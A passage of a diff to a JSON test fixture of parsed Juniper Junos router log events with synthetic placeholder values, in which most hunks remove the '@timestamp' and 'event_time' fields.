"rsa.time.event_time": "2020-08-30T17:48:33.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -452,7 +420,6 @@ ] }, { - "@timestamp": "2020-09-14T00:51:07.000Z", "event.action": "eri", "event.code": "RPD_KRT_IFL_GENERATION", "event.dataset": "juniper.junos", 
@@ -473,7 +440,6 @@ "rsa.misc.result": "unknown", "rsa.network.interface": "lo2169", "rsa.time.day": "13", - "rsa.time.event_time": "2020-09-14T00:51:07.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -482,7 +448,6 @@ ] }, { - "@timestamp": "2020-09-28T07:53:42.000Z", "event.code": "[3453]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -495,7 +460,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[3453]", "rsa.time.day": "28", - "rsa.time.event_time": "2020-09-28T07:53:42.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -504,7 +468,6 @@ ] }, { - "@timestamp": "2020-10-12T14:56:16.000Z", "event.action": "RMOPD_usage", "event.code": "RMOPD_usage", "event.dataset": "juniper.junos", @@ -525,7 +488,6 @@ "rsa.misc.pid": "3993", "rsa.misc.result": "failure", "rsa.time.day": "12", - "rsa.time.event_time": "2020-10-12T14:56:16.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -534,7 +496,6 @@ ] }, { - "@timestamp": "2020-10-26T21:58:50.000Z", "event.action": "RPD_ISIS_LSPCKSUM:", "event.code": "tasun", "event.dataset": "juniper.junos", @@ -559,7 +520,6 @@ "rsa.misc.result_code": "eratv", "rsa.network.interface": "enp0s1965", "rsa.time.day": "26", - "rsa.time.event_time": "2020-10-26T21:58:50.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -568,7 +528,6 @@ ] }, { - "@timestamp": "2020-11-10T05:01:24.000Z", "event.action": "VPN", "event.code": "kmd", "event.dataset": "juniper.junos", @@ -583,7 +542,6 @@ "rsa.internal.messageid": "kmd", "rsa.misc.event_type": "VPN", "rsa.time.day": "10", - "rsa.time.event_time": "2020-11-10T05:01:24.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -592,7 +550,6 @@ ] }, { - "@timestamp": "2020-11-24T12:03:59.000Z", "destination.address": "erspi4926.www5.test", "event.action": "LOGIN_FAILED:", "event.code": "LOGIN_FAILED", 
@@ -624,7 +581,6 @@ "rsa.misc.pid": "6463", "rsa.network.host_dst": "erspi4926.www5.test", "rsa.time.day": "24", - "rsa.time.event_time": "2020-11-24T12:03:59.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -634,7 +590,6 @@ "user.name": "atq" }, { - "@timestamp": "2020-12-08T19:06:33.000Z", "event.action": "iadese", "event.code": "CHASSISD_MBUS_ERROR", "event.dataset": "juniper.junos", @@ -653,7 +608,6 @@ "rsa.misc.event_type": "iadese", "rsa.misc.result_code": "imad", "rsa.time.day": "8", - "rsa.time.event_time": "2020-12-08T19:06:33.000Z", "rsa.time.month": "Dec", "service.name": "nisiu", "service.type": "juniper", @@ -663,7 +617,6 @@ ] }, { - "@timestamp": "2019-12-23T02:09:07.000Z", "event.action": "TFTPD_NAK_ERR", "event.code": "TFTPD_NAK_ERR", "event.dataset": "juniper.junos", @@ -684,7 +637,6 @@ "rsa.misc.pid": "1471", "rsa.misc.result_code": "ptatems", "rsa.time.day": "23", - "rsa.time.event_time": "2019-12-23T02:09:07.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -693,7 +645,6 @@ ] }, { - "@timestamp": "2020-01-06T09:11:41.000Z", "event.action": "atqu", "event.code": "UI_DUPLICATE_UID", "event.dataset": "juniper.junos", @@ -708,14 +659,13 @@ "process.name": "UI_DUPLICATE_UID: restart", "process.pid": 3350, "related.user": [ - "olorsita", - "naturau" + "naturau", + "olorsita" ], "rsa.internal.event_desc": "Users have the same UID", "rsa.internal.messageid": "UI_DUPLICATE_UID", "rsa.misc.event_type": "atqu", "rsa.time.day": "6", - "rsa.time.event_time": "2020-01-06T09:11:41.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -725,7 +675,6 @@ "user.name": "naturau" }, { - "@timestamp": "2020-01-20T16:14:16.000Z", "event.action": "TFTPD_CREATE_ERR:", "event.code": "TFTPD_CREATE_ERR", "event.dataset": "juniper.junos", 
@@ -745,7 +694,6 @@ "rsa.misc.pid": "4753", "rsa.misc.result": "unknown", "rsa.time.day": "20", - "rsa.time.event_time": "2020-01-20T16:14:16.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -754,7 +702,6 @@ ] }, { - "@timestamp": "2020-02-03T23:16:50.000Z", "event.code": "[1269]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -767,7 +714,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[1269]", "rsa.time.day": "3", - "rsa.time.event_time": "2020-02-03T23:16:50.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -776,7 +722,6 @@ ] }, { - "@timestamp": "2020-02-18T06:19:24.000Z", "event.dataset": "juniper.junos", "event.module": "juniper", "event.original": "Feb 18 04:19:24 fpc2 COSMAN: : uptasnul: delete class_to_ifl table 2069, ifl 3693", @@ -787,7 +732,6 @@ "observer.type": "Routers", "observer.vendor": "Juniper", "rsa.time.day": "18", - "rsa.time.event_time": "2020-02-18T06:19:24.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -796,7 +740,6 @@ ] }, { - "@timestamp": "2020-03-04T13:21:59.000Z", "event.action": "SNMPD_TRAP_QUEUE_MAX_ATTEMPTS", "event.code": "SNMPD_TRAP_QUEUE_MAX_ATTEMPTS", "event.dataset": "juniper.junos", @@ -818,7 +761,6 @@ "rsa.misc.event_type": "SNMPD_TRAP_QUEUE_MAX_ATTEMPTS", "rsa.misc.obj_name": "exercita", "rsa.time.day": "4", - "rsa.time.event_time": "2020-03-04T13:21:59.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -827,7 +769,6 @@ ] }, { - "@timestamp": "2020-03-18T20:24:33.000Z", "event.action": "ntut", "event.code": "TFTPD_BIND_ERR", "event.dataset": "juniper.junos", @@ -846,7 +787,6 @@ "rsa.misc.event_type": "ntut", "rsa.misc.result": "failure", "rsa.time.day": "18", - "rsa.time.event_time": "2020-03-18T20:24:33.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -855,7 +795,6 @@ ] }, { - "@timestamp": "2020-04-02T03:27:07.000Z", "destination.ip": [ "10.88.126.165" ], 
@@ -880,7 +819,6 @@ "rsa.misc.event_type": "RPD_LDP_SESSIONDOWN:", "rsa.misc.result": "failure", "rsa.time.day": "2", - "rsa.time.event_time": "2020-04-02T03:27:07.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -889,7 +827,6 @@ ] }, { - "@timestamp": "2020-04-16T10:29:41.000Z", "event.code": "[180]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -902,7 +839,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[180]", "rsa.time.day": "16", - "rsa.time.event_time": "2020-04-16T10:29:41.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -911,7 +847,6 @@ ] }, { - "@timestamp": "2020-04-30T17:32:16.000Z", "event.action": "iumdo", "event.code": "NASD_CHAP_INVALID_CHAP_IDENTIFIER", "event.dataset": "juniper.junos", @@ -933,7 +868,6 @@ "rsa.misc.result_code": "ectetura", "rsa.network.interface": "lo2721", "rsa.time.day": "30", - "rsa.time.event_time": "2020-04-30T17:32:16.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -942,7 +876,6 @@ ] }, { - "@timestamp": "2020-05-15T00:34:50.000Z", "event.action": "allow", "event.code": "UI_LOAD_EVENT", "event.dataset": "juniper.junos", @@ -966,7 +899,6 @@ ], "rsa.misc.event_type": "seq", "rsa.time.day": "14", - "rsa.time.event_time": "2020-05-15T00:34:50.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -976,7 +908,6 @@ "user.name": "moll" }, { - "@timestamp": "2020-05-29T07:37:24.000Z", "event.action": "SNMP_TRAP_TRACE_ROUTE_TEST_FAILED", "event.code": "SNMP_TRAP_TRACE_ROUTE_TEST_FAILED", "event.dataset": "juniper.junos", @@ -997,7 +928,6 @@ "rsa.misc.obj_name": "edic", "rsa.misc.pid": "4053", "rsa.time.day": "29", - "rsa.time.event_time": "2020-05-29T07:37:24.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -1006,7 +936,6 @@ ] }, { - "@timestamp": "2020-06-12T14:39:58.000Z", "event.action": "uae", "event.code": "SNMPD_RTSLIB_ASYNC_EVENT", "event.dataset": "juniper.junos", 
@@ -1026,7 +955,6 @@ "rsa.misc.event_type": "uae", "rsa.misc.result": "failure", "rsa.time.day": "12", - "rsa.time.event_time": "2020-06-12T14:39:58.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -1035,7 +963,6 @@ ] }, { - "@timestamp": "2020-06-26T21:42:33.000Z", "event.action": "BOOTPD_TIMEOUT:", "event.code": "BOOTPD_TIMEOUT", "event.dataset": "juniper.junos", @@ -1054,7 +981,6 @@ "rsa.misc.event_type": "BOOTPD_TIMEOUT:", "rsa.misc.result": "success", "rsa.time.day": "26", - "rsa.time.event_time": "2020-06-26T21:42:33.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -1063,7 +989,6 @@ ] }, { - "@timestamp": "2020-07-11T04:45:07.000Z", "event.action": "abore", "event.code": "NASD_RADIUS_MESSAGE_UNEXPECTED", "event.dataset": "juniper.junos", @@ -1082,7 +1007,6 @@ "rsa.misc.event_type": "abore", "rsa.misc.result": "unknown", "rsa.time.day": "11", - "rsa.time.event_time": "2020-07-11T04:45:07.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -1091,7 +1015,6 @@ ] }, { - "@timestamp": "2020-07-25T11:47:41.000Z", "event.action": "illum", "event.code": "PWC_LOCKFILE_BAD_FORMAT", "event.dataset": "juniper.junos", @@ -1110,7 +1033,6 @@ "rsa.misc.client": "eprehe", "rsa.misc.event_type": "illum", "rsa.time.day": "25", - "rsa.time.event_time": "2020-07-25T11:47:41.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -1119,7 +1041,6 @@ ] }, { - "@timestamp": "2020-08-08T18:50:15.000Z", "event.action": "RPD_KRT_AFUNSUPRT", "event.code": "RPD_KRT_AFUNSUPRT", "event.dataset": "juniper.junos", @@ -1141,7 +1062,6 @@ "rsa.misc.pid": "1613", "rsa.misc.result_code": "tec", "rsa.time.day": "8", - "rsa.time.event_time": "2020-08-08T18:50:15.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1150,7 +1070,6 @@ ] }, { - "@timestamp": "2020-08-23T01:52:50.000Z", "event.action": "PWC_PROCESS_FORCED_HOLD", "event.code": "PWC_PROCESS_FORCED_HOLD", "event.dataset": "juniper.junos", 
@@ -1170,7 +1089,6 @@ "rsa.misc.event_type": "PWC_PROCESS_FORCED_HOLD", "rsa.misc.pid": "6086", "rsa.time.day": "22", - "rsa.time.event_time": "2020-08-23T01:52:50.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1179,7 +1097,6 @@ ] }, { - "@timestamp": "2020-09-06T08:55:24.000Z", "event.action": "tiu", "event.code": "MIB2D_IFL_IFINDEX_FAILURE", "event.dataset": "juniper.junos", @@ -1202,7 +1119,6 @@ "rsa.misc.event_type": "tiu", "rsa.misc.result": "unknown", "rsa.time.day": "6", - "rsa.time.event_time": "2020-09-06T08:55:24.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -1212,7 +1128,6 @@ "user.name": "wri" }, { - "@timestamp": "2020-09-20T15:57:58.000Z", "event.action": "UI_DBASE_MISMATCH_MAJOR:", "event.code": "UI_DBASE_MISMATCH_MAJOR", "event.dataset": "juniper.junos", @@ -1233,7 +1148,6 @@ "rsa.internal.messageid": "UI_DBASE_MISMATCH_MAJOR", "rsa.misc.event_type": "UI_DBASE_MISMATCH_MAJOR:", "rsa.time.day": "20", - "rsa.time.event_time": "2020-09-20T15:57:58.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -1242,7 +1156,6 @@ ] }, { - "@timestamp": "2020-10-04T23:00:32.000Z", "event.action": "SNMPD_VIEW_INSTALL_DEFAULT", "event.code": "SNMPD_VIEW_INSTALL_DEFAULT", "event.dataset": "juniper.junos", @@ -1263,7 +1176,6 @@ "rsa.misc.event_type": "SNMPD_VIEW_INSTALL_DEFAULT", "rsa.misc.result": "eetdo: success", "rsa.time.day": "4", - "rsa.time.event_time": "2020-10-04T23:00:32.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -1272,7 +1184,6 @@ ] }, { - "@timestamp": "2020-10-19T06:03:07.000Z", "event.action": "uptatem", "event.code": "DCD_PARSE_STATE_EMERGENCY", "event.dataset": "juniper.junos", @@ -1290,7 +1201,6 @@ "rsa.internal.messageid": "DCD_PARSE_STATE_EMERGENCY", "rsa.misc.event_type": "uptatem", "rsa.time.day": "19", - "rsa.time.event_time": "2020-10-19T06:03:07.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ 
@@ -1299,7 +1209,6 @@ ] }, { - "@timestamp": "2020-11-02T13:05:41.000Z", "event.action": "LOGIN_PAM_MAX_RETRIES:", "event.code": "LOGIN_PAM_MAX_RETRIES", "event.dataset": "juniper.junos", @@ -1326,7 +1235,6 @@ "rsa.misc.event_type": "LOGIN_PAM_MAX_RETRIES:", "rsa.misc.result": "Too many retries while authenticating user", "rsa.time.day": "2", - "rsa.time.event_time": "2020-11-02T13:05:41.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -1336,7 +1244,6 @@ "user.name": "iquipex" }, { - "@timestamp": "2020-11-16T20:08:15.000Z", "event.action": "BOOTPD_NO_BOOTSTRING", "event.code": "BOOTPD_NO_BOOTSTRING", "event.dataset": "juniper.junos", @@ -1356,7 +1263,6 @@ "rsa.misc.event_type": "BOOTPD_NO_BOOTSTRING", "rsa.misc.pid": "3290", "rsa.time.day": "16", - "rsa.time.event_time": "2020-11-16T20:08:15.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -1365,7 +1271,6 @@ ] }, { - "@timestamp": "2020-12-01T03:10:49.000Z", "event.code": "sshd", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1390,7 +1295,6 @@ "rsa.investigations.ec_outcome": "Failure", "rsa.investigations.ec_theme": "Authentication", "rsa.time.day": "1", - "rsa.time.event_time": "2020-12-01T03:10:49.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -1400,7 +1304,6 @@ "user.name": "ciatisun" }, { - "@timestamp": "2020-12-15T10:13:24.000Z", "event.code": "COS", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1416,7 +1319,6 @@ "rsa.internal.event_desc": "Received FC Q map", "rsa.internal.messageid": "COS", "rsa.time.day": "15", - "rsa.time.event_time": "2020-12-15T10:13:24.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -1425,7 +1327,6 @@ ] }, { - "@timestamp": "2019-12-29T17:15:58.000Z", "event.action": "nvolupta", "event.code": "cgatool", "event.dataset": "juniper.junos", 
@@ -1443,7 +1344,6 @@ "rsa.misc.event_type": "nvolupta", "rsa.misc.result": "success", "rsa.time.day": "29", - "rsa.time.event_time": "2019-12-29T17:15:58.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -1452,7 +1352,6 @@ ] }, { - "@timestamp": "2020-01-13T00:18:32.000Z", "event.action": "idolor", "event.code": "CHASSISD_SNMP_TRAP6", "event.dataset": "juniper.junos", @@ -1472,7 +1371,6 @@ "rsa.misc.event_type": "idolor", "rsa.misc.result": "success", "rsa.time.day": "12", - "rsa.time.event_time": "2020-01-13T00:18:32.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -1481,7 +1379,6 @@ ] }, { - "@timestamp": "2020-01-27T07:21:06.000Z", "event.dataset": "juniper.junos", "event.module": "juniper", "event.original": "Jan 27 05:21:06 ssb FLOW_REASSEMBLE_SUCCEED: : Packet merged source 10.102.228.136 destination 10.151.136.250 ipid upt succeed", @@ -1492,7 +1389,6 @@ "observer.type": "Routers", "observer.vendor": "Juniper", "rsa.time.day": "27", - "rsa.time.event_time": "2020-01-27T07:21:06.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -1501,7 +1397,6 @@ ] }, { - "@timestamp": "2020-02-10T14:23:41.000Z", "event.action": "serrorsi", "event.code": "DFWD_PARSE_FILTER_EMERGENCY", "event.dataset": "juniper.junos", @@ -1519,7 +1414,6 @@ "rsa.internal.messageid": "DFWD_PARSE_FILTER_EMERGENCY", "rsa.misc.event_type": "serrorsi", "rsa.time.day": "10", - "rsa.time.event_time": "2020-02-10T14:23:41.000Z", "rsa.time.month": "Feb", "service.name": "tsedquia", "service.type": "juniper", @@ -1529,7 +1423,6 @@ ] }, { - "@timestamp": "2020-02-24T21:26:15.000Z", "destination.ip": [ "10.148.255.126" ], @@ -1554,7 +1447,6 @@ "rsa.misc.event_type": "RPD_LDP_SESSIONDOWN:", "rsa.misc.result": "unknown", "rsa.time.day": "24", - "rsa.time.event_time": "2020-02-24T21:26:15.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ 
@@ -1563,7 +1455,6 @@ ] }, { - "@timestamp": "2020-03-11T04:28:49.000Z", "event.code": "[mipsumqu]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1576,7 +1467,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[mipsumqu]", "rsa.time.day": "11", - "rsa.time.event_time": "2020-03-11T04:28:49.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -1585,7 +1475,6 @@ ] }, { - "@timestamp": "2020-03-25T11:31:24.000Z", "event.code": "lsys_ssam_handler", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1602,7 +1491,6 @@ "rsa.internal.messageid": "lsys_ssam_handler", "rsa.misc.node": "mquis", "rsa.time.day": "25", - "rsa.time.event_time": "2020-03-25T11:31:24.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -1611,7 +1499,6 @@ ] }, { - "@timestamp": "2020-04-08T18:33:58.000Z", "event.action": "loreeuf", "event.code": "UI_LOST_CONN", "event.dataset": "juniper.junos", @@ -1630,7 +1517,6 @@ "rsa.misc.client": "orainci", "rsa.misc.event_type": "loreeuf", "rsa.time.day": "8", - "rsa.time.event_time": "2020-04-08T18:33:58.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -1639,7 +1525,6 @@ ] }, { - "@timestamp": "2020-04-23T01:36:32.000Z", "event.action": "itse", "event.code": "PWC_PROCESS_HOLD", "event.dataset": "juniper.junos", @@ -1658,7 +1543,6 @@ "rsa.misc.client": "lapari", "rsa.misc.event_type": "itse", "rsa.time.day": "22", - "rsa.time.event_time": "2020-04-23T01:36:32.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -1667,7 +1551,6 @@ ] }, { - "@timestamp": "2020-05-07T08:39:06.000Z", "event.action": "LIBSERVICED_SOCKET_BIND", "event.code": "LIBSERVICED_SOCKET_BIND", "event.dataset": "juniper.junos", 
@@ -1687,7 +1570,6 @@ "rsa.misc.result": "failure", "rsa.misc.result_code": ": dantium", "rsa.time.day": "7", - "rsa.time.event_time": "2020-05-07T08:39:06.000Z", "rsa.time.month": "May", "rsa.wireless.wlan_ssid": "ors", "service.type": "juniper", @@ -1697,7 +1579,6 @@ ] }, { - "@timestamp": "2020-05-21T15:41:41.000Z", "destination.address": "mSect5899.domain", "event.action": "LOGIN_FAILED:", "event.code": "LOGIN_FAILED", @@ -1728,7 +1609,6 @@ "rsa.misc.event_type": "LOGIN_FAILED:", "rsa.network.host_dst": "mSect5899.domain", "rsa.time.day": "21", - "rsa.time.event_time": "2020-05-21T15:41:41.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -1738,7 +1618,6 @@ "user.name": "olu" }, { - "@timestamp": "2020-06-04T22:44:15.000Z", "event.action": "MIB2D_IFL_IFINDEX_FAILURE:", "event.code": "MIB2D_IFL_IFINDEX_FAILURE", "event.dataset": "juniper.junos", @@ -1762,7 +1641,6 @@ "rsa.misc.pid": "6535", "rsa.misc.result": "unknown", "rsa.time.day": "4", - "rsa.time.event_time": "2020-06-04T22:44:15.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -1772,7 +1650,6 @@ "user.name": "deseru" }, { - "@timestamp": "2020-06-19T05:46:49.000Z", "event.action": "CHASSISD_RELEASE_MASTERSHIP:", "event.code": "CHASSISD_RELEASE_MASTERSHIP", "event.dataset": "juniper.junos", @@ -1791,7 +1668,6 @@ "rsa.misc.event_type": "CHASSISD_RELEASE_MASTERSHIP:", "rsa.misc.pid": "5276", "rsa.time.day": "19", - "rsa.time.event_time": "2020-06-19T05:46:49.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -1800,7 +1676,6 @@ ] }, { - "@timestamp": "2020-07-03T12:49:23.000Z", "event.code": "[3450]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1813,7 +1688,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[3450]", "rsa.time.day": "3", - "rsa.time.event_time": "2020-07-03T12:49:23.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ 
@@ -1822,7 +1696,6 @@ ] }, { - "@timestamp": "2020-07-17T19:51:58.000Z", "event.action": "SERVICED_RTSOCK_SEQUENCE", "event.code": "SERVICED_RTSOCK_SEQUENCE", "event.dataset": "juniper.junos", @@ -1843,7 +1716,6 @@ "rsa.misc.pid": "226", "rsa.misc.result": "unknown", "rsa.time.day": "17", - "rsa.time.event_time": "2020-07-17T19:51:58.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -1852,7 +1724,6 @@ ] }, { - "@timestamp": "2020-08-01T02:54:32.000Z", "event.action": "VPN", "event.code": "idpinfo", "event.dataset": "juniper.junos", @@ -1868,7 +1739,6 @@ "rsa.misc.event_type": "VPN", "rsa.misc.pid": "940", "rsa.time.day": "1", - "rsa.time.event_time": "2020-08-01T02:54:32.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1877,7 +1747,6 @@ ] }, { - "@timestamp": "2020-08-15T09:57:06.000Z", "event.action": "oreeufug", "event.code": "RPD_KRT_NOIFD", "event.dataset": "juniper.junos", @@ -1898,7 +1767,6 @@ "rsa.misc.event_type": "oreeufug", "rsa.network.interface": "lo4593", "rsa.time.day": "15", - "rsa.time.event_time": "2020-08-15T09:57:06.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1907,7 +1775,6 @@ ] }, { - "@timestamp": "2020-08-29T16:59:40.000Z", "event.action": "craftd:", "event.code": "craftd", "event.dataset": "juniper.junos", @@ -1926,7 +1793,6 @@ "rsa.misc.event_type": "craftd:", "rsa.misc.result": "unknown", "rsa.time.day": "29", - "rsa.time.event_time": "2020-08-29T16:59:40.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1935,7 +1801,6 @@ ] }, { - "@timestamp": "2020-09-13T00:02:15.000Z", "event.action": "eetd", "event.code": "ACCT_CU_RTSLIB_error", "event.dataset": "juniper.junos", @@ -1957,7 +1822,6 @@ "rsa.misc.result": "success", "rsa.network.interface": "enp0s2674", "rsa.time.day": "12", - "rsa.time.event_time": "2020-09-13T00:02:15.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ 
@@ -1966,7 +1830,6 @@ ] }, { - "@timestamp": "2020-09-27T07:04:49.000Z", "event.action": "VPN", "event.code": "kmd", "event.dataset": "juniper.junos", @@ -1981,7 +1844,6 @@ "rsa.internal.messageid": "kmd", "rsa.misc.event_type": "VPN", "rsa.time.day": "27", - "rsa.time.event_time": "2020-09-27T07:04:49.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -1990,7 +1852,6 @@ ] }, { - "@timestamp": "2020-10-11T14:07:23.000Z", "event.action": "rauto", "event.code": "LOGIN_PAM_NONLOCAL_USER", "event.dataset": "juniper.junos", @@ -2017,7 +1878,6 @@ "rsa.misc.event_type": "rauto", "rsa.misc.result": "User authenticated but has no local login ID", "rsa.time.day": "11", - "rsa.time.event_time": "2020-10-11T14:07:23.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -2027,7 +1887,6 @@ "user.name": "rese" }, { - "@timestamp": "2020-10-25T21:09:57.000Z", "event.action": "RPD_KRT_NOIFD", "event.code": "RPD_KRT_NOIFD", "event.dataset": "juniper.junos", @@ -2049,7 +1908,6 @@ "rsa.misc.pid": "6184", "rsa.network.interface": "enp0s7694", "rsa.time.day": "25", - "rsa.time.event_time": "2020-10-25T21:09:57.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -2058,7 +1916,6 @@ ] }, { - "@timestamp": "2020-11-09T04:12:32.000Z", "event.code": "uspinfo", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2074,7 +1931,6 @@ "rsa.internal.event_desc": "flow_print_session_summary_output received", "rsa.internal.messageid": "uspinfo", "rsa.time.day": "9", - "rsa.time.event_time": "2020-11-09T04:12:32.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2083,7 +1939,6 @@ ] }, { - "@timestamp": "2020-11-23T11:15:06.000Z", "event.action": "mfugi", "event.code": "RPD_TASK_REINIT", "event.dataset": "juniper.junos", 
@@ -2101,7 +1956,6 @@ "rsa.internal.messageid": "RPD_TASK_REINIT", "rsa.misc.event_type": "mfugi", "rsa.time.day": "23", - "rsa.time.event_time": "2020-11-23T11:15:06.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2110,7 +1964,6 @@ ] }, { - "@timestamp": "2020-12-07T18:17:40.000Z", "event.action": "allow", "event.code": "ECCD_TRACE_FILE_OPEN_FAILED", "event.dataset": "juniper.junos", @@ -2133,7 +1986,6 @@ "rsa.misc.pid": "2509", "rsa.misc.result": "failure", "rsa.time.day": "7", - "rsa.time.event_time": "2020-12-07T18:17:40.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -2142,7 +1994,6 @@ ] }, { - "@timestamp": "2019-12-22T01:20:14.000Z", "event.action": "accept", "event.code": "ECCD_TRACE_FILE_OPEN_FAILED", "event.dataset": "juniper.junos", @@ -2164,7 +2015,6 @@ "rsa.misc.event_type": "rudexer", "rsa.misc.result": "unknown", "rsa.time.day": "21", - "rsa.time.event_time": "2019-12-22T01:20:14.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -2173,7 +2023,6 @@ ] }, { - "@timestamp": "2020-01-05T08:22:49.000Z", "destination.address": "tod6376.mail.host", "event.action": "LOGIN_FAILED:", "event.code": "LOGIN_FAILED", @@ -2204,7 +2053,6 @@ "rsa.misc.event_type": "LOGIN_FAILED:", "rsa.network.host_dst": "tod6376.mail.host", "rsa.time.day": "5", - "rsa.time.event_time": "2020-01-05T08:22:49.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -2214,7 +2062,6 @@ "user.name": "turQ" }, { - "@timestamp": "2020-01-19T15:25:23.000Z", "event.action": "FSAD_CONNTIMEDOUT", "event.code": "FSAD_CONNTIMEDOUT", "event.dataset": "juniper.junos", @@ -2241,7 +2088,6 @@ "rsa.misc.obj_type": "reprehen", "rsa.misc.pid": "1578", "rsa.time.day": "19", - "rsa.time.event_time": "2020-01-19T15:25:23.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "source.address": "oreve2538.www.localdomain", 
@@ -2254,7 +2100,6 @@ ] }, { - "@timestamp": "2020-02-02T22:27:57.000Z", "event.action": "rinre", "event.code": "UI_SCHEMA_SEQUENCE_ERROR", "event.dataset": "juniper.junos", @@ -2272,7 +2117,6 @@ "rsa.internal.messageid": "UI_SCHEMA_SEQUENCE_ERROR", "rsa.misc.event_type": "rinre", "rsa.time.day": "2", - "rsa.time.event_time": "2020-02-02T22:27:57.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -2281,7 +2125,6 @@ ] }, { - "@timestamp": "2020-02-17T05:30:32.000Z", "event.action": "deny", "event.code": "LIBJNX_EXEC_PIPE", "event.dataset": "juniper.junos", @@ -2303,7 +2146,6 @@ "rsa.misc.event_type": "olors", "rsa.misc.result": "unknown", "rsa.time.day": "17", - "rsa.time.event_time": "2020-02-17T05:30:32.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -2312,7 +2154,6 @@ ] }, { - "@timestamp": "2020-03-03T12:33:06.000Z", "event.action": "isnost", "event.code": "UI_DBASE_MISMATCH_EXTENT", "event.dataset": "juniper.junos", @@ -2333,7 +2174,6 @@ "rsa.misc.client": "lumdolor", "rsa.misc.event_type": "isnost", "rsa.time.day": "3", - "rsa.time.event_time": "2020-03-03T12:33:06.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -2342,7 +2182,6 @@ ] }, { - "@timestamp": "2020-03-17T19:35:40.000Z", "event.action": "eumfu", "event.code": "NASD_usage", "event.dataset": "juniper.junos", @@ -2362,7 +2201,6 @@ "rsa.misc.event_type": "eumfu", "rsa.misc.result": "unknown", "rsa.time.day": "17", - 